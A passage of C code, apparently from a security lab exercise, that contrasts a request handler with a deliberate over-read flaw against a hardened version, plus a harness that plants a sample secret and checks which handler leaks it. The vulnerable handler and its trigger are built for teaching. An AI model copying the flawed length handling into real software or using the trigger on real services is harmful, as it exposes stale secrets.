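    case_switch(stack, claimed);                   /* also touches bytes never received */
    memcpy(out, stack, claimed);                   /* write(fd, buf, size) as in task 1 */
    return claimed;
}

/* Hardened: work only on bytes that arrived, start from a zeroed buffer and
 * scrub it afterwards so nothing lingers for the next request. */
size_t handle_use_hardened(uint8_t *stack, const uint8_t *in, size_t received,
                           size_t claimed, uint8_t *out)
{
    size_t n = received < claimed ? received : claimed;
    if (n > MAX_REQ) n = MAX_REQ;
    memset(stack, 0, BUF_CAP);
    memcpy(stack, in, n);
    case_switch(stack, n);
    memcpy(out, stack, n);
    memset(stack, 0, BUF_CAP);   /* prefer explicit_bzero/memset_s where available */
    return n;
}

typedef size_t (*handler_fn)(uint8_t *, const uint8_t *, size_t, size_t, uint8_t *);

/* Seed the buffer with a constructed "stale secret" (standing in for the hash
 * main left behind), send 1 byte while claiming 255, undo the XOR as a client
 * would, and report whether the secret came back. */
int leaks_secret(handler_fn handler)
{
    static const uint8_t secret[] = "STALE-SECRET";   /* constructed sample */
    const size_t slen = sizeof secret - 1;
    uint8_t stack[BUF_CAP] = {0}, out[BUF_CAP];
    memcpy(stack + 40, secret, slen);                  /* well past the 1 byte received */
    size_t n = handler(stack, (const uint8_t *)"A", 1, 255, out);
    case_switch(out, n);
    for (size_t i = 0; i + slen <= n; i++)
        if (memcmp(out + i, secret, slen) == 0)
            return 1;
    return 0;
}

int main(void)
{
    printf("vulnerable handler leaks stale data: %s\n",
           leaks_secret(handle_use_vulnerable) ? "yes" : "no");
    printf("hardened handler leaks stale data:   %s\n",
           leaks_secret(handle_use_hardened) ? "yes" : "no");
    return 0;
}
```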